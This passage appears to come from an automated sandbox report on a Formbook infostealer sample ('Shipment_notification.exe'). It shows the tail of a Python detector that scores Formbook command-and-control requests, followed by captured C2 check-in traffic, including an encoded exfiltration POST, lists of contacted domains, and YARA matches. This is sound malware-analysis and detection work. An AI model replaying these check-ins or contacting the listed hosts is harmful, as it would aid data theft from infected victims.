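        if len(params) == 1 and FORMBOOK_B64.match(params[0][1]):
            reasons.append("single form field with custom-alphabet base64 value")
        if headers.get("user-agent") == IE11_WIN10_UA:
            reasons.append("hard-coded IE11/Windows 10 User-Agent")
        if headers.get("referer") == f"http://{headers.get('host', '')}{url.path}":
            reasons.append("Referer is the check-in URL itself")
    return len(reasons), reasons


def detect(requests, threshold=4):
    """Return (host, method, score, reasons) for requests scoring at or above threshold."""
    hits = []
    for req in requests:
        score, reasons = score_request(req)
        if score >= threshold:
            host = {k.lower(): v for k, v in req["headers"].items()}.get("host", "")
            hits.append((host, req["method"], score, reasons))
    return hits


SAMPLE_REQUESTS = [
    # Copied from this report's traffic.
    {"method": "GET", "headers": {"Host": "www.isabellagambitta.com", "Connection": "close"}, "body": "",
     "uri": "/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA"},
    {"method": "POST", "uri": "/rs5b/",
     "headers": {"Host": "www.drkathleensanders.com", "Connection": "close", "Content-Length": "187",
                 "Cache-Control": "no-cache", "Origin": "http://www.drkathleensanders.com",
                 "User-Agent": IE11_WIN10_UA, "Content-Type": "application/x-www-form-urlencoded",
                 "Accept": "*/*", "Referer": "http://www.drkathleensanders.com/rs5b/",
                 "Accept-Language": "en-US", "Accept-Encoding": "gzip, deflate"},
     "body": "uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA)."},
    # Constructed benign traffic: a short path alone must not alert.
    {"method": "GET", "uri": "/blog/", "body": "",
     "headers": {"Host": "www.example.net", "Connection": "keep-alive",
                 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/111.0 Safari/537.36"}},
    {"method": "POST", "uri": "/wp-login.php", "body": "log=admin&pwd=hunter2&wp-submit=Log+In",
     "headers": {"Host": "www.example.net", "Connection": "keep-alive", "User-Agent": IE11_WIN10_UA,
                 "Content-Type": "application/x-www-form-urlencoded"}},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_REQUESTS):
        print(hit)
```

The IE11-on-Windows-10 User-Agent is common in legitimate traffic and the short path and Connection: close each occur on their own, so no single feature is an alert; the combination is. The GET scores 4 and the POST 5 with these records, while the constructed benign GET to /blog/ stops at 1.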
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:47 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 
27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 
27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 20 Mar 2023 15:49:55 GMTserver: LiteSpeedData Raw: 31 32 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 77 db b6 b2 7e b6 7f 05 4c af d8 62 0b 52 24 75 35 15 3a a7 3b 6d 9f da dd ae 5e 1e ce 4a 72 bc 20 12 94 90 90 04 37 00 5d 7c 54 ff f7 bd 00 90 e2 45 94 e5 ca a9 bd e2 88 c0 cc 37 83 c1 60 00 cc 50 17 6f af be ff e5 fd 1f ff fb eb 0f 60 29 d2 e4 fe f2 e2 ad fc 1f 24 28 5b 04 06 ce ac 3f 7f 37 54 23 46 d1 fd e5 c5 c5 db 14 0b 04 c2 25 62 1c 8b c0 f8 f3 8f 1f ad a9 01 fa 55 57 86 52 1c 18 6b 82 37 39 65 c2 00 21 cd 04 ce 44 60 6c 48 24 96 41 84 d7 24 c4 96 7a 80 80 64 44 10 94 58 3c 44 09 0e 5c 29 e9 e2 6d 42 b2 2f 80 e1 24 30 72 46 63 92 60 03 2c 19 8e 03 63 29 44 ce fd 7e 7f 91 e6 0b 9b b2 45 7f 1b 67 7d b7 e0 12 44 24 f8 fe 57 b4 c0 20 a3 02 c4 74 95 45 e0 e6 7a ea b9 ee 0c bc 47 2c a4 1c 91 6c 8d b9 78 db d7 b4 97 7a 2c 4a e1 5b 46 e7 54 f0 db bd ba b7 29 da 5a 24 45 0b 6c e5 0c cb e1 f8 09 62 0b 7c 2b c7 5a a9 78 1b 65 5c 12 c4 58 84 cb 5b ad e7 6d bf 1f d6 e5 d9 21 4d 5b 6c 06 4a 04 66 19 12 d8 00 e2 31 c7 81 81 f2 3c 21 21 12 84 66 7d c6 f9 b7 db 34 31 80 d2 33 30 1a da 83 1b 86 fe b3 a2 33 f0 23 c6 51 db 32 07 72 fb 31 c6 51 5f 4d 50 a5 f4 d7 90 fe 9e a6 29 ce 04 7f a1 1a 61 41 5e d7 87 87 8c e4 e2 fe 72 8d 18 c8 d1 02 27 e8 11 b3 07 f4 19 6d 57 2c 01 01 d8 cf f7 e1 a8 36 b9 85 a2 94 64 7d f5 d7 92 3c 76 be cc df 19 b3 16 da 22 a1 73 94 3c 64 34 0b b1 84 1c df c5 6e 3c 89 dc d0 3b 20 e5 98 ad 31 7b 10 24 95 94 ee 78 72 37 f0 26 83 bb 51 1b 92 f0 87 84 ac 15 da 01 46 8c 42 3c a7 f4 cb 03 89 a4 b4 83 7e 8e 85 20 d9 82 83 00 ec 8c 9c 72 f1 20 67 9f 1b fe 07 f5 64 40 43 1a c2 f8 04 0d 9c a1 79 82 1f 16 
64 8d 99 e1 1b ae 01 8d 14 6d 1f d4 ba 31 7c d7 9d 38 d0 10 92 44 3c cc 19 46 5f 72 4a 32 61 f8 93 f1 14 1a 29 9d 93 04 37 da 07 63 07 1a 9c 44 78 8e 98 e1 c7 28 e1 18 1a 73 1a 3d 3e c4 54 f2 19 06 34 42 9a d0 b2 f3 a9 3d 6a 86 43 94 8b 70 f9 20 03 43 31 b6 b7 fd 62 0a df 72 f1 98 60 40 a2 c0 c8 69 be 4a 10 8b b7 96 36 bd a5 ba 78 e9 e6 02 6f 45 3f e4 dc b8 bf b4 39 11 d8 5a 62 14 61 06 76 73 14 7e 59 30 b9 68 2d a5 87 7f 1d ab 9f 2b 92 ca 38 82 32 31 7b 2a 58 d4 aa 00 08 ec 0a 42 77 22 7f 9f 23 04 72 90 16 27 ff 8f 7d 30 70 40 be 9d 81 12 2c c2 7a 0c 84 66 2d 40 d0 81 d8 a0 ae 81 ba a3 7c bb d7 2f a6 54 74 0f a9 d0 14 d4 c7 74 f9 b6 af 4c 74 5f 5b 9f 39 c3 09 45 07 ab 5b 0a e4 f6 82 d2 45 82 51 4e b8 0c 2c d2 98 ef 62 94 92 e4 31 f8 95 e6 39 c9 f8 9b c1 77 43 c7 79 33 79 ff b3 a4 c7 8c 21 a1 9b 0c 80 78 60 a8 50 65 80 90 51 ce 29 23 0b 92 05 06 ca 68 f6 98 d2 15 37 ea 6a d4 63 5b 3b d2 14 ba 70 81 04 09 a5 22 46 3d 2c 1a 39 c3 21 cd 32 1c 8a d3 8c c7 55 a9 b9 55 19 1f ac 0d dd 58 28 23 a9 0a 95 da bb 0e 9d cb
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:50:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: unknown HTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
Source: unknown DNS traffic detected: queries for: www.emagrecarapido.store
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: Shipment_notification.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
